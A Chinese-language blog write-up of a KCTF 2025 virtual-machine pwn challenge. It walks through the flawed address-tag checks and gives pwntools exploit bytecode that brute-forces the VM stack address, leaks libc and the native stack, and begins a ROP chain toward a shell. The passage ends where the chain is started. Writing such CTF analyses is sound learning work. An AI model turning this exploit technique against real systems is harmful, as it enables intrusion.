Ikoct的饮冰室

你愿意和我学一辈子二进制吗?

0%

记一次VMPWN分析

本题为KCTF 2025第八题, 做这题的时候上网查找VMPWN相关资料发现基本都是一些把vm布置在栈上或明显的越界漏洞, 本题的漏洞点很少而且做完之后确实学到了新东西, 故作此记录

初步分析

程序实现了一个虚拟机, 有自己的栈和内存区, 虚拟机的内存段被固定映射到0x200000, 代码区被随机映射:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
// Allocate and initialise the VM state. Sizes visible below: a 0x28-byte vm
// struct, two 0x1000-byte mappings (text and mem), a 0x40-byte register file
// and a 0x800-byte stack. Returns the vm pointer.
// NOTE(review): zalloc/zmmap are opaque here -- presumably zero-filling
// wrappers around malloc/mmap; confirm in the binary.
vm *do_malloc()
{
vm *vm; // rbx
vm *vm_1; // rbx
vm *vm_2; // rbx
vm *vm_3; // rbx
vm *vm_4; // rax

// 0x64 = 100: alarm armed before any VM setup happens.
alarm(0x64u);
vm = (vm *)zalloc(0x28u);
vm->PC = 0;
// NOTE(review): self-assignment is a decompiler naming artifact -- presumably
// the local pointer is stored into a global that shares the name `vm`.
vm = vm;
// First argument 0: no fixed address is requested for the code page.
vm->text = zmmap(0, 0x1000u);
vm_1 = vm;
// The data page is requested at the fixed address 0x200000.
vm_1->mem = zmmap((void *)0x200000, 0x1000u);
vm_2 = vm;
vm_2->regs = zalloc(0x40u);
vm_3 = vm;
vm_3->stack = zalloc(0x800u);
vm_4 = vm;
vm->SP = 0;
return vm_4;
}

相关结构体:

1
2
3
4
5
6
7
8
9
// VM state block; do_malloc allocates it with zalloc(0x28) and fills every field.
struct vm
{
_DWORD PC; // set to 0 by do_malloc
_DWORD SP; // set to 0 by do_malloc
_BYTE *stack; // 0x800-byte buffer from zalloc
_BYTE *mem; // 0x1000-byte mapping requested at 0x200000
_BYTE *text; // 0x1000-byte mapping with no fixed address requested
_QWORD *regs; // 0x40-byte buffer from zalloc
};

写个脚本导出函数让AI分析各个操作码对应的操作(我到底什么时候能用上MCP啊):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import ida_funcs, ida_hexrays

# Address range scanned for functions to dump (inclusive on both ends).
start = 0x0000000000001314
end = 0x0000000000002A64

# Entry addresses already written, so each function is dumped exactly once
# even though the scan visits every byte address inside it.
func = set()

# Open the output once (still append mode) instead of once per function.
with open('funcs.txt', 'a', encoding='utf-8') as file:
    while start <= end:
        f = ida_funcs.get_func(start)
        if f and f.start_ea not in func:
            func.add(f.start_ea)
            try:
                file.write(str(ida_hexrays.decompile(f)) + '\n')
            except ida_hexrays.DecompilationFailure as exc:
                # Keep going: one function Hex-Rays cannot handle should not
                # abort the whole dump. Leave a marker in the output instead.
                file.write('// decompilation failed at {:#x}: {}\n'.format(f.start_ea, exc))
        start += 1
Opcode 原函数 作用 建议命名
0x00 sub_1314 从寄存器 chunk4[rN] 压栈 op_push_reg
0x01 sub_13AA 压常数到栈 op_push_imm
0x02 sub_141B 压常数地址解引用的值到栈 op_push_mem
0x03 sub_1494 栈顶弹出 → 存到寄存器 rN op_pop_reg
0x04 sub_1532 r[dst] = r[src](寄存器间拷贝) op_mov_reg_reg
0x05 sub_15AC r[dst] = imm(立即数写寄存器) op_mov_reg_imm
0x06 sub_1600 r[dst] = r[dst] + r[src](带溢出检查) op_add_reg_reg
0x07 sub_1787 r[dst] += imm op_add_reg_imm
0x08 sub_1864 r[dst] = r[dst] - r[src] op_sub_reg_reg
0x09 sub_19EB r[dst] -= imm op_sub_reg_imm
0x0A sub_1AC8 r[dst] *= r[src] op_mul_reg_reg
0x0B sub_1C53 r[dst] *= imm op_mul_reg_imm
0x0C sub_1D34 r[dst] /= r[src] op_div_reg_reg
0x0D sub_1EC0 r[dst] /= imm op_div_reg_imm
0x0E sub_1FA2 r[dst] &= r[src] op_and_reg_reg
0x0F sub_2129 r[dst] &= imm op_and_reg_imm
0x10 sub_2206 r[dst] |= r[src] op_or_reg_reg
0x11 sub_238D r[dst] |= imm op_or_reg_imm
0x12 sub_246A r[dst] ^= r[src] op_xor_reg_reg
0x13 sub_25F1 r[dst] ^= imm op_xor_reg_imm
0x14 sub_26CE r[dst] = *r[src](寄存器作为指针解引用 load) op_load_mem
0x15 sub_2782 *r[addr] = r[value](store) op_store_mem
0x16 sub_2831 if (r[a] > r[b]) pc += imm(条件跳转) op_jmp_gt
0x17 sub_28ED if (r[a] < r[b]) pc += imm op_jmp_lt
0x18 sub_29A9 if (r[a] == r[b]) pc += imm op_jmp_eq
0x19 - 结束程序 op_halt

同时拷打AI写出汇编工具:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
# asmbuilder.py
# Tiny bytecode builder for the 8-byte-per-instruction VM.

import struct
from typing import Dict, List, Tuple, Union

# --- Registers (VM 里 min(..., 8u),保守支持 0..8) ---
R0, R1, R2, R3, R4, R5, R6, R7, R8 = range(9)

def _clamp_reg(r: int) -> int:
if r < 0: return 0
if r > 8: return 8
return r

def _ins(op: int, b1: int = 0, b2: int = 0, imm: int = 0) -> bytes:
    """Encode one 8-byte instruction laid out as |op|b1|b2|pad0|imm32_le|.

    Args:
        op: Opcode; only the low 8 bits are kept.
        b1: First operand byte; clamped to 0..8 by ``_clamp_reg``.
        b2: Second operand byte; clamped to 0..8 by ``_clamp_reg``.
        imm: Immediate; truncated to 32 bits, so a negative value is emitted
            as its two's-complement bit pattern.

    Returns:
        Exactly 8 bytes: three header bytes, one zero pad byte and the
        little-endian 32-bit immediate.
    """
    header = bytes([op & 0xFF, _clamp_reg(b1) & 0xFF, _clamp_reg(b2) & 0xFF, 0])
    return header + struct.pack("<I", imm & 0xFFFFFFFF)

# --- Stack / register moves ---
def push_reg(src_reg: int) -> bytes:
    """Opcode 0x00: push a register; the register index is encoded in byte 2."""
    return _ins(0x00, 0, src_reg, 0)


def push(imm: int) -> bytes:
    """Opcode 0x01: push a 32-bit immediate (encoded in bytes 4..7)."""
    return _ins(0x01, 0, 0, imm)


def push_ptr(addr32: int) -> bytes:
    """Opcode 0x02: push a pointer-flavoured immediate.

    NOTE(review): the original note says the VM tags/converts the value at
    run time; the exact semantics are not visible here -- confirm against
    the handler.
    """
    return _ins(0x02, 0, 0, addr32)


def pop_reg(dst_reg: int) -> bytes:
    """Opcode 0x03: pop the top of stack into a register (index in byte 1)."""
    return _ins(0x03, dst_reg, 0, 0)


def mov_reg_reg(dst_reg: int, src_reg: int) -> bytes:
    """Opcode 0x04: r[dst] = r[src] (dst in byte 1, src in byte 2)."""
    return _ins(0x04, dst_reg, src_reg, 0)


def mov_reg_imm(dst_reg: int, imm: int) -> bytes:
    """Opcode 0x05: r[dst] = imm (dst in byte 1, imm32 in bytes 4..7)."""
    return _ins(0x05, dst_reg, 0, imm)

# --- ALU (reg/reg & reg/imm) ---
def add_reg_reg(dst: int, src: int) -> bytes:
    """Opcode 0x06: r[dst] += r[src]."""
    return _ins(0x06, dst, src, 0)


def add_reg_imm(dst: int, imm: int) -> bytes:
    """Opcode 0x07: r[dst] += imm32."""
    return _ins(0x07, dst, 0, imm)


def sub_reg_reg(dst: int, src: int) -> bytes:
    """Opcode 0x08: r[dst] -= r[src]."""
    return _ins(0x08, dst, src, 0)


def sub_reg_imm(dst: int, imm: int) -> bytes:
    """Opcode 0x09: r[dst] -= imm32."""
    return _ins(0x09, dst, 0, imm)


def mul_reg_reg(dst: int, src: int) -> bytes:
    """Opcode 0x0A: r[dst] *= r[src]."""
    return _ins(0x0A, dst, src, 0)


def mul_reg_imm(dst: int, imm: int) -> bytes:
    """Opcode 0x0B: r[dst] *= imm32."""
    return _ins(0x0B, dst, 0, imm)


def div_reg_reg(dst: int, src: int) -> bytes:
    """Opcode 0x0C: r[dst] /= r[src]."""
    return _ins(0x0C, dst, src, 0)


def div_reg_imm(dst: int, imm: int) -> bytes:
    """Opcode 0x0D: r[dst] /= imm32."""
    return _ins(0x0D, dst, 0, imm)

# --- Bitwise ---
def and_reg_reg(dst: int, src: int) -> bytes:
    """Opcode 0x0E: r[dst] &= r[src]."""
    return _ins(0x0E, dst, src, 0)


def and_reg_imm(dst: int, imm: int) -> bytes:
    """Opcode 0x0F: r[dst] &= imm32."""
    return _ins(0x0F, dst, 0, imm)


def or_reg_reg(dst: int, src: int) -> bytes:
    """Opcode 0x10: r[dst] |= r[src]."""
    return _ins(0x10, dst, src, 0)


def or_reg_imm(dst: int, imm: int) -> bytes:
    """Opcode 0x11: r[dst] |= imm32."""
    return _ins(0x11, dst, 0, imm)


def xor_reg_reg(dst: int, src: int) -> bytes:
    """Opcode 0x12: r[dst] ^= r[src]."""
    return _ins(0x12, dst, src, 0)


def xor_reg_imm(dst: int, imm: int) -> bytes:
    """Opcode 0x13: r[dst] ^= imm32."""
    return _ins(0x13, dst, 0, imm)

# --- Memory ---
def load_mem(dst_reg: int, src_ptr_reg: int) -> bytes:
    """Opcode 0x14: r[dst] = *r[src_ptr] (dst in byte 1, pointer register in byte 2)."""
    return _ins(0x14, dst_reg, src_ptr_reg, 0)


def store_mem(addr_reg: int, value_reg: int) -> bytes:
    """Opcode 0x15: *r[addr] = r[value] (address register in byte 1, value register in byte 2)."""
    return _ins(0x15, addr_reg, value_reg, 0)

# --- Control flow (PC 从下一条起算 += imm32;自然语义只支持向前偏移) ---
def jmp_gt(ra: int, rb: int, delta: int) -> bytes:
    """Opcode 0x16: if r[ra] > r[rb], pc += delta.

    ``delta`` is truncated to 32 bits by the encoder, so a negative value is
    emitted as its two's-complement pattern.
    NOTE(review): whether the VM wraps that into a backward jump is not
    visible in this module -- confirm against the handler.
    """
    return _ins(0x16, ra, rb, delta)


def jmp_lt(ra: int, rb: int, delta: int) -> bytes:
    """Opcode 0x17: if r[ra] < r[rb], pc += delta (same encoding as jmp_gt)."""
    return _ins(0x17, ra, rb, delta)


def jmp_eq(ra: int, rb: int, delta: int) -> bytes:
    """Opcode 0x18: if r[ra] == r[rb], pc += delta (same encoding as jmp_gt)."""
    return _ins(0x18, ra, rb, delta)


def halt() -> bytes:
    """Opcode 0x19: stop the VM."""
    return _ins(0x19, 0, 0, 0)

# --------------------------------------------------------------------
# Label-aware builder (可选):支持 jmp_* 到标签名,会在 finalize() 时求偏移
# --------------------------------------------------------------------
JumpSpec = Tuple[int, int, int, str] # (opcode, ra, rb, label)

class ProgramBuilder:
    """Accumulate 8-byte instructions and resolve label-based jump offsets.

    Jumps to a label name are emitted with a zero placeholder offset and
    patched in ``finalize()``. Offsets are counted in instructions, relative
    to the instruction that follows the jump.
    """

    def __init__(self):
        self.buf = bytearray()
        # label name -> instruction index
        self.labels: Dict[str, int] = {}
        # (index of the jump instruction, (opcode, ra, rb, label name))
        self.fixups: List[Tuple[int, JumpSpec]] = []

    def pc(self) -> int:
        """Return the index of the next instruction (8 bytes per instruction)."""
        return len(self.buf) // 8

    def emit(self, ins: bytes) -> "ProgramBuilder":
        """Append one already-encoded 8-byte instruction; returns self for chaining."""
        assert isinstance(ins, (bytes, bytearray)) and len(ins) == 8
        self.buf += ins
        return self

    def label(self, name: str) -> "ProgramBuilder":
        """Bind ``name`` to the current instruction index; returns self."""
        self.labels[name] = self.pc()
        return self

    # Label-aware jumps: delta = label_idx - (ins_idx + 1).
    def jmp_gt(self, ra: int, rb: int, target: Union[int, str]) -> "ProgramBuilder":
        """Emit opcode 0x16 towards a raw delta (int) or a label name (str)."""
        return self._jmp_op(0x16, ra, rb, target)

    def jmp_lt(self, ra: int, rb: int, target: Union[int, str]) -> "ProgramBuilder":
        """Emit opcode 0x17 towards a raw delta (int) or a label name (str)."""
        return self._jmp_op(0x17, ra, rb, target)

    def jmp_eq(self, ra: int, rb: int, target: Union[int, str]) -> "ProgramBuilder":
        """Emit opcode 0x18 towards a raw delta (int) or a label name (str)."""
        return self._jmp_op(0x18, ra, rb, target)

    def _jmp_op(self, op: int, ra: int, rb: int, target: Union[int, str]) -> "ProgramBuilder":
        """Emit a jump; an int target is used as the delta, a str is resolved later."""
        ins_idx = self.pc()
        if isinstance(target, int):
            self.emit(_ins(op, ra, rb, target))
        else:
            # Emit a zero placeholder now and remember where to patch it.
            self.emit(_ins(op, ra, rb, 0))
            self.fixups.append((ins_idx, (op, ra, rb, target)))
        return self

    def finalize(self) -> bytes:
        """Patch every pending label jump and return the program bytes.

        Raises:
            KeyError: a jump refers to a label that was never defined.
        """
        for ins_idx, (_, ra, rb, label) in self.fixups:
            if label not in self.labels:
                raise KeyError(f"Undefined label: {label}")
            label_idx = self.labels[label]
            # Offset is measured from the instruction after the jump.
            delta = label_idx - (ins_idx + 1)
            # Overwrite the little-endian imm32 field (bytes 4..7).
            pos = ins_idx * 8 + 4
            self.buf[pos:pos + 4] = struct.pack("<I", delta & 0xFFFFFFFF)
        self.fixups.clear()
        return bytes(self.buf)

# --- 简短别名,方便直接拼接 ---
# 例如:bytecode = b""; bytecode += push(123); bytecode += pop_reg(R0); bytecode += halt()

程序中所有涉及到数组的操作都对下标进行了检验, 有关下标唯一的漏洞我只在push_imm里找到一个, 在栈指针自增后是先进行赋值再检验下标的, 可以越界访问1个qword, 但是我不知道有什么用.

另外程序还对地址值有检验, 要通过vm来执行类似mov [r0], r1的操作时会对r0检验其最高位是否置1, 这是vm对有效地址打的tag, 同时通过运算得出的地址(通过是否带tag来判断)会检测其是否在vm的栈和内存段的合法区域, 不在的话会强制转化为内存段的初始位置.

程序漏洞

而在限制运算得到地址这一点上程序对寄存器之间的运算和寄存器与立即数之间的运算是不同的, 以乘法为例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
// Register-register multiply handler: regs[dst] = regs[src] * regs[dst].
// The address check is driven by whether the OPERANDS were flagged by isaddr()
// BEFORE the multiply; the product itself is never passed to isaddr(). Two
// operands that are both unflagged can therefore produce any value unchecked.
// NOTE(review): isaddr() is opaque here -- presumably it tests bit 63.
unsigned __int64 __fastcall mul_reg_reg(__int64 a1)
{
unsigned __int64 result; // rax
_QWORD *v2; // rbx
unsigned __int8 v3; // [rsp+14h] [rbp-Ch]
char v4; // [rsp+15h] [rbp-Bh]
unsigned __int8 v5; // [rsp+16h] [rbp-Ah]
char v6; // [rsp+17h] [rbp-9h]

// v3 = destination index from instruction byte 1, capped at 8.
v3 = min(*(unsigned __int8 *)(a1 + 1), 8u);
v4 = isaddr(vm->regs[v3]);
// v5 = source index from instruction byte 2, capped at 8.
v5 = min(*(unsigned __int8 *)(a1 + 2), 8u);
v6 = isaddr(vm->regs[v5]);
result = vm->regs[v5] * vm->regs[v3];
vm->regs[v3] = result;
if ( v4 || v6 )
{
if ( v4 && v6 )
{
// Both operands were flagged: just clear bit 63 of the product.
result = (unsigned __int64)&vm->regs[v3];
*(_QWORD *)result &= ~0x8000000000000000LL;
}
else
{
// Exactly one operand was flagged: strip bit 63 and let check_addr()
// decide what is stored back.
v2 = &vm->regs[v3];
result = check_addr(*v2 & 0x7FFFFFFFFFFFFFFFLL);
*v2 = result;
}
}
return result;
}

// Register-immediate multiply handler: regs[dst] *= imm32.
// Here isaddr() is applied to the RESULT, so any product it flags is passed
// through check_addr() before being stored back.
unsigned __int64 __fastcall mul_reg_imm(__int64 a1)
{
unsigned __int64 result; // rax
_QWORD *v2; // rbx
unsigned __int8 v3; // [rsp+17h] [rbp-9h]

// v3 = destination index from instruction byte 1, capped at 8.
v3 = min(*(unsigned __int8 *)(a1 + 1), 8u);
// The immediate is read as an unsigned 32-bit value from instruction offset 4.
vm->regs[v3] *= *(unsigned int *)(a1 + 4);
result = isaddr(vm->regs[v3]);
if ( (_BYTE)result )
{
v2 = &vm->regs[v3];
result = check_addr(*v2 & 0x7FFFFFFFFFFFFFFFLL);
*v2 = result;
}
return result;
}

寄存器之间的运算只会在运算前寄存器本身就是带tag的地址值才会进行检测, 而和立即数的运算会在运算完后检测算出的结果是否为地址值并检测合法性.

另外一点就出在check_addr上:

1
2
3
4
5
6
7
// Validate an address whose bit 63 has already been stripped by the caller.
// Accepts a1 when it is at most 0xFF8 bytes past vm->mem or at most 0x7F8 bytes
// past vm->stack and returns it with bit 63 set; otherwise returns vm->mem with
// bit 63 set. The subtractions are unsigned, so an address below the base wraps
// to a huge value and fails the comparison.
unsigned __int64 __fastcall check_addr(__int64 a1)
{
if ( a1 - (unsigned __int64)vm->mem <= 0xFF8 || a1 - (unsigned __int64)vm->stack <= 0x7F8 )
return a1 | 0x8000000000000000LL;
else
return (unsigned __int64)vm->mem | 0x8000000000000000LL;
}

本来只需要检验地址是否落在固定映射的mem上就好了, stack本身是随机映射的, 用户不应该能得到其地址值.

获得vm栈段被映射到的地址

综合以上两点可以通过爆破的方式得到stack被映射到的地址, 伪代码如下:

1
2
3
4
5
6
7
8
9
mov r1, start
mov r3, mem
l1:
add r2, 0x1000
mov r0, r1
mul r0, 2
add r0, r2
cmp r0, mem
je l1

调试可以发现vm栈段被映射到的地址低12位是320h:

QQ_1756608060869

最高1字节就选定为0x55, 低12位固定为0x320, 只需要爆破中间28位(48 - 8 - 12)即可, bytecode如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
from pwn import *
from asmbuilder import *

# Target setup: architecture plus the challenge binary and its libc.
context.arch = 'amd64'
elf = ELF('./pwn')
# so = ELF('/home/i/PC_File/libs/2.35-0ubuntu3.9_amd64/libc.so.6')
so = ELF('./libc.so.6')
# Short aliases around the tube `p`. `p` is looked up when an alias is called,
# so it must be assigned at module level before any of them is used.
s = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
r = lambda num=4096 :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
# Unpack helpers: pad short reads with NUL bytes before u32/u64.
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
# Read up to a 0x7f / 0xf7 byte and unpack the trailing 6 / 4 bytes as an address.
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))

def write_qword(qword, reg):
    """Return bytecode that loads a wide constant into register ``reg``.

    Instructions only carry a 32-bit immediate, so the value is assembled as
    ((bits 32 and up) * 0x10000 | bits 16..31) * 0x10000 | bits 0..15, using
    a multiply by 1 << 16 as the left shift.

    NOTE(review): every step is a register/immediate operation; a constant or
    intermediate value with bit 63 set would presumably be rewritten by the
    VM's address check, so callers should keep bit 63 clear.
    """
    q1, q2, q3 = qword >> 32, (qword >> 16) & 0xffff, qword & 0xffff
    return b''.join((
        mov_reg_imm(reg, q1),
        mul_reg_imm(reg, 1 << 16),
        or_reg_imm(reg, q2),
        mul_reg_imm(reg, 1 << 16),
        or_reg_imm(reg, q3),
    ))

def tag(reg):
    """Return bytecode that sets bit 63 on register ``reg``.

    The emitted sequence computes ((reg // 2) | (1 << 62)) * r4:
    r7 is loaded with 1 << 31 and squared to get 1 << 62, OR-ed into the
    halved value, and the final multiply by r4 shifts everything up one bit.

    Preconditions and side effects:
      * r4 must already hold 2 (the final multiply uses register 4).
      * r7 is clobbered.
      * bit 0 of the original value is lost by the halving.
    """
    return b''.join((
        div_reg_imm(reg, 2),
        mov_reg_imm(7, 1 << 31),
        mul_reg_reg(7, 7),
        or_reg_reg(reg, 7),
        mul_reg_reg(reg, 4),
    ))

# First candidate for the brute force, stored as (address | bit 63) >> 1 so the
# constant itself has bit 63 clear while it is being loaded.
guess_start = (0x550000000320 | (1 << 63)) >> 1
# NOTE(review): presumably the offset of a `pop rdi; ret` gadget inside libc -- confirm.
pop_rdi = 0x000000000002a3e5

bc = b''
bc += push_reg(0)
# r1 = halved, tagged starting guess.
bc += write_qword(guess_start, 1)
# r3 = whatever push_ptr(0) pushes; it is the loop's comparison value below.
bc += push_ptr(0)
bc += pop_reg(3)
# r4 = 2: multiplier that undoes the halving via a register/register multiply.
bc += mov_reg_imm(4, 2)
# l1
# r2 accumulates the page offset, growing by 0x1000 per iteration.
bc += add_reg_imm(2, 0x1000)
bc += mov_reg_reg(0, 1)
bc += mul_reg_reg(0, 4)
bc += add_reg_reg(0, 2)
# -5 is counted from the instruction after the jump, i.e. back to the add at l1.
bc += jmp_eq(0, 3, -5)
# jump to l1 if r0 == r3
# Now the vm-stack | TAG is stored in reg[0]

上面说过寄存器和立即数的运算会导致检测地址, 所以这里存起来的实际上是(TAG | addr) >> 1, 在要算出地址时与存放了2的寄存器r4做乘法即可得到带tag的地址且不会被检测, 这一步在本机上的爆破时间不超过5秒, 但是靶机很可能程序给的100秒alarm都不够用, 要多尝试几次, 至此我们获得了任意已知地址读写的能力.

泄露libc地址

在得到了一个堆地址后就好办很多了, 注意到开头push了两次吗? 现在只需要将堆上vm代码段的地址放入vm的栈基址中, 再进行一次pop操作就能将一个mmap出的地址送入寄存器中, 而mmap出的地址与ld间有固定偏移:

QQ_1756608507445

而ld中存放了大量libc中的地址:

QQ_1756608554799

这里就选择这个_dl_catch_exception, 存放它的位置与vm代码段(text)映射地址的偏移为0x3018, 这一步的bytecode:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# On entry r0 holds vm-stack | TAG. Split it, drop the tag, and rebuild the
# plain address so it can be used as an ordinary value.
bc += mov_reg_reg(1, 0)
bc += mov_reg_reg(3, 0)
bc += and_reg_imm(1, 0xffff) # r1 = low 16 bits of the vm-stack address
bc += div_reg_imm(0, 1 << 16)
bc += and_reg_imm(0, 0xffffffff) # r0 = bits 16..47 of the vm-stack address (tag masked off)

bc += mul_reg_imm(0, 1 << 16)
bc += or_reg_reg(0, 1) # r0 = vm-stack (untagged)
bc += mov_reg_reg(2, 0)
bc += sub_reg_imm(2, 0x68) # r2 = vm-stack - 0x68 (presumably &vm->text; offset depends on heap layout)
# Halve, subtract half the offset, then double via r4 (== 2) to keep the tag.
bc += div_reg_imm(3, 2)
bc += sub_reg_imm(3, 0x78 // 2)
bc += mul_reg_reg(3, 4) # r3 = (vm-stack - 0x78) | TAG, i.e. &vm->stack per the write-up
bc += store_mem(3, 2) # stored value is r2, so the VM stack base now equals vm-stack - 0x68
bc += pop_reg(0) # r0 = vm-text

bc += add_reg_imm(0, 0x3018)
bc += tag(0) # r0 = (vm-text + 0x3018) | TAG
bc += load_mem(1, 0)
bc += sub_reg_imm(1, so.sym['_dl_catch_exception']) # r1 = libc-base

泄露原生栈地址

程序开启了got表保护, 不用思考改got来getshell了, 我的想法是通过libc中的environ泄露栈地址来修改函数返回地址写入ROP链, 这一步的bytecode:

1
2
3
4
5
# r1 holds the libc base on entry; derive the native return-address slot from it.
bc += mov_reg_reg(2, 1)
bc += add_reg_imm(2, so.sym['environ'])
bc += tag(2) # r2 = environ | TAG
bc += load_mem(2, 2) # r2 = stack
# NOTE(review): 0x130 is presumably the debugger-measured distance from the
# environ value to the saved return address -- confirm for the target build.
bc += sub_reg_imm(2, 0x130) # r2 = ret-addr

写入ROP

接下来就没什么好说的了, 写入返回到system("/bin/sh")的ROP链, 这里直接返回上去栈会不对齐, 要多放一个ret

完整exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
from pwn import *
from asmbuilder import *

# Target setup: architecture plus the challenge binary and its libc.
context.arch = 'amd64'
elf = ELF('./pwn')
# so = ELF('/home/i/PC_File/libs/2.35-0ubuntu3.9_amd64/libc.so.6')
so = ELF('./libc.so.6')
# Short aliases around the tube `p`. `p` is looked up when an alias is called,
# so it must be assigned at module level before any of them is used.
s = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
r = lambda num=4096 :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
# Unpack helpers: pad short reads with NUL bytes before u32/u64.
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
# Read up to a 0x7f / 0xf7 byte and unpack the trailing 6 / 4 bytes as an address.
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))

def write_qword(qword, reg):
    """Return bytecode that loads a wide constant into register ``reg``.

    Instructions only carry a 32-bit immediate, so the value is assembled as
    ((bits 32 and up) * 0x10000 | bits 16..31) * 0x10000 | bits 0..15, using
    a multiply by 1 << 16 as the left shift.

    NOTE(review): every step is a register/immediate operation; a constant or
    intermediate value with bit 63 set would presumably be rewritten by the
    VM's address check, so callers should keep bit 63 clear.
    """
    q1, q2, q3 = qword >> 32, (qword >> 16) & 0xffff, qword & 0xffff
    return b''.join((
        mov_reg_imm(reg, q1),
        mul_reg_imm(reg, 1 << 16),
        or_reg_imm(reg, q2),
        mul_reg_imm(reg, 1 << 16),
        or_reg_imm(reg, q3),
    ))

def tag(reg):
    """Return bytecode that sets bit 63 on register ``reg``.

    The emitted sequence computes ((reg // 2) | (1 << 62)) * r4:
    r7 is loaded with 1 << 31 and squared to get 1 << 62, OR-ed into the
    halved value, and the final multiply by r4 shifts everything up one bit.

    Preconditions and side effects:
      * r4 must already hold 2 (the final multiply uses register 4).
      * r7 is clobbered.
      * bit 0 of the original value is lost by the halving.
    """
    return b''.join((
        div_reg_imm(reg, 2),
        mov_reg_imm(7, 1 << 31),
        mul_reg_reg(7, 7),
        or_reg_reg(reg, 7),
        mul_reg_reg(reg, 4),
    ))
# guess_start = (0x550000000320 | (1 << 63)) >> 1
# First candidate for the brute force, stored as (address | bit 63) >> 1 so the
# constant itself has bit 63 clear while it is being loaded.
guess_start = (0x550000000320 | (1 << 63)) >> 1
# NOTE(review): presumably the offset of a `pop rdi; ret` gadget inside libc -- confirm.
pop_rdi = 0x000000000002a3e5

bc = b''
bc += push_reg(0)
# r1 = halved, tagged starting guess.
bc += write_qword(guess_start, 1)
# r3 = whatever push_ptr(0) pushes; it is the loop's comparison value below.
bc += push_ptr(0)
bc += pop_reg(3)
# r4 = 2: multiplier that undoes the halving via a register/register multiply.
bc += mov_reg_imm(4, 2)
# l1
# r2 accumulates the page offset, growing by 0x1000 per iteration.
bc += add_reg_imm(2, 0x1000)
bc += mov_reg_reg(0, 1)
bc += mul_reg_reg(0, 4)
bc += add_reg_reg(0, 2)
# -5 is counted from the instruction after the jump, i.e. back to the add at l1.
bc += jmp_eq(0, 3, -5)
# jump to l1 if r0 == r3
# Now the vm-stack | TAG is stored in reg[0]

# Split r0, drop the tag, and rebuild the plain vm-stack address.
bc += mov_reg_reg(1, 0)
bc += mov_reg_reg(3, 0)
bc += and_reg_imm(1, 0xffff) # r1 = low 16 bits of the vm-stack address
bc += div_reg_imm(0, 1 << 16)
bc += and_reg_imm(0, 0xffffffff) # r0 = bits 16..47 of the vm-stack address (tag masked off)

bc += mul_reg_imm(0, 1 << 16)
bc += or_reg_reg(0, 1) # r0 = vm-stack (untagged)
bc += mov_reg_reg(2, 0)
bc += sub_reg_imm(2, 0x68) # r2 = vm-stack - 0x68 (presumably &vm->text; offset depends on heap layout)
# Halve, subtract half the offset, then double via r4 (== 2) to keep the tag.
bc += div_reg_imm(3, 2)
bc += sub_reg_imm(3, 0x78 // 2)
bc += mul_reg_reg(3, 4) # r3 = (vm-stack - 0x78) | TAG, i.e. &vm->stack per the write-up
bc += store_mem(3, 2) # stored value is r2, so the VM stack base now equals vm-stack - 0x68
bc += pop_reg(0) # r0 = vm-text

bc += add_reg_imm(0, 0x3018)
bc += tag(0) # r0 = (vm-text + 0x3018) | TAG
bc += load_mem(1, 0)
bc += sub_reg_imm(1, so.sym['_dl_catch_exception']) # r1 = libc-base
bc += mov_reg_reg(2, 1)
bc += add_reg_imm(2, so.sym['environ'])
bc += tag(2) # r2 = environ | TAG
bc += load_mem(2, 2) # r2 = stack
# NOTE(review): 0x130 is presumably the debugger-measured distance from the
# environ value to the saved return address -- confirm for the target build.
bc += sub_reg_imm(2, 0x130) # r2 = ret-addr

# r3 still holds the tagged address written through earlier; overwrite the
# VM stack base a second time, now with the native return-address slot.
bc += store_mem(3, 2)
# Now the stack of vm is pointing to the return address

# Start building the ROP-chain
# Each entry is libc-base (r1) plus an offset, written with a VM push.
